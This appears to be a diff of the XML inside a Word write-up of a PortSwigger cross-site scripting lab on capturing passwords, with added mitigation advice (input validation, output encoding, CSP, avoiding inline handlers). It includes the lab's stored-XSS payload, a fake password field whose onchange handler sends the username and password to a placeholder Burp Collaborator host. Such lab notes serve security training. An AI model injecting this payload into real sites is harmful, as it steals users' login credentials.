--- a/PortSwigger Labs/Client Side Topics/Cross Site Scripting - XSS/Lab 25 - Exploiting cross-site scripting to capture passwords.docx
+++ b/PortSwigger Labs/Client Side Topics/Cross Site Scripting - XSS/Lab 25 - Exploiting cross-site scripting to capture passwords.docx
@@ -513,13 +513,164 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Input Validation:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Before storing any user input in the database, validate it thoroughly. Establish strict patterns or values for each input type and reject any data that doesn't fit. This can prevent malicious scripts or unexpected data from being stored in the first place.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Output Encoding:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Whenever the application displays user-generated content, it should safely encode it. Characters that can be interpreted as code in HTML or JavaScript, like &lt;, &gt;, or &amp;, should be rendered as their HTML encoded equivalents, e.g., &amp;lt;, &amp;gt;, and &amp;amp;.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Content Security Policy (CSP):</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Implement a robust CSP to prevent the execution of unauthorized scripts. A CSP can significantly reduce the risk of XSS attacks by controlling which scripts are allowed to execute.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Anti-Cross-Site Scripting Libraries:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Use libraries that are designed to prevent XSS by encoding data properly before displaying it.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Avoid Inline Event Handlers:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Like the onchange event used in the payload. Instead, use external scripts to add event listeners to DOM elements. This makes it harder for attackers to inject malicious scripts via event handlers.</w:t>
+      </w:r>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
@@ -898,6 +1049,95 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="463B1A79"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="E6C0E358"/>
+    <w:lvl w:ilvl="0" w:tplc="4009000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="4009000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="4009000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="68F30063"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="412CAB28"/>
@@ -987,7 +1227,7 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="518083980">
-    <w:abstractNumId w:val="4"/>
+    <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="1806852917">
     <w:abstractNumId w:val="1"/>
@@ -1000,6 +1240,9 @@
   </w:num>
   <w:num w:numId="5" w16cid:durableId="1129974817">
     <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="6" w16cid:durableId="739600827">
+    <w:abstractNumId w:val="4"/>
   </w:num>
 </w:numbering>
 </file>

--- a/PortSwigger Labs/Client Side Topics/Cross Site Scripting - XSS/Lab 25 - Exploiting cross-site scripting to capture passwords.docx
+++ b/PortSwigger Labs/Client Side Topics/Cross Site Scripting - XSS/Lab 25 - Exploiting cross-site scripting to capture passwords.docx
@@ -252,7 +252,25 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>It will force the application to make a POST HTTP request to the BurpSuite’s Collaborator Client.</w:t>
+        <w:t xml:space="preserve">It will force the application to make a POST HTTP request to the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>BurpSuite’s</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Collaborator Client.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -284,7 +302,27 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve">the username:password </w:t>
+        <w:t xml:space="preserve">the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>username:password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -318,13 +356,25 @@
         </w:rPr>
         <w:t xml:space="preserve">Copy the </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">username:password </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>username:password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -442,15 +492,28 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>&lt;input type=password name=password onchange="if(this.value.length)fetch('https://BURP-COLLABORATOR-SUBDOMAIN',{</w:t>
+        <w:t>&lt;input type=password name=password onchange="if(this.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>value.length</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>)fetch('https://BURP-COLLABORATOR-SUBDOMAIN',{</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
-      <w:r>
-        <w:t>method:'POST',</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>method:'POST</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>',</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -458,16 +521,39 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t>mode: 'no-cors',</w:t>
+        <w:t>mode: 'no-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cors</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>',</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
-      <w:r>
-        <w:t>body:username.value+':'+this.value</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>body:username</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>.value</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>+':'+</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>this.value</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -476,6 +562,126 @@
       <w:r>
         <w:t>});"&gt;</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0C318E3E" wp14:editId="4EA8E8C5">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="margin">
+              <wp:align>center</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>635635</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5087060" cy="5172797"/>
+            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
+            <wp:wrapTopAndBottom/>
+            <wp:docPr id="1166386252" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1166386252" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId5"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5087060" cy="5172797"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:t>PROOF OF CONCEPT</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -564,7 +770,6 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Output Encoding:</w:t>
       </w:r>
       <w:r>
@@ -573,7 +778,53 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Whenever the application displays user-generated content, it should safely encode it. Characters that can be interpreted as code in HTML or JavaScript, like &lt;, &gt;, or &amp;, should be rendered as their HTML encoded equivalents, e.g., &amp;lt;, &amp;gt;, and &amp;amp;.</w:t>
+        <w:t xml:space="preserve"> Whenever the application displays user-generated content, it should safely encode it. Characters that can be interpreted as code in HTML or JavaScript, like &lt;, &gt;, or &amp;, should be rendered as their HTML encoded equivalents, e.g., &amp;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>lt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>;,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &amp;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>gt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>;, and &amp;amp;.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -597,6 +848,7 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Content Security Policy (CSP):</w:t>
       </w:r>
       <w:r>
@@ -669,7 +921,25 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Like the onchange event used in the payload. Instead, use external scripts to add event listeners to DOM elements. This makes it harder for attackers to inject malicious scripts via event handlers.</w:t>
+        <w:t xml:space="preserve"> Like the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>onchange</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> event used in the payload. Instead, use external scripts to add event listeners to DOM elements. This makes it harder for attackers to inject malicious scripts via event handlers.</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
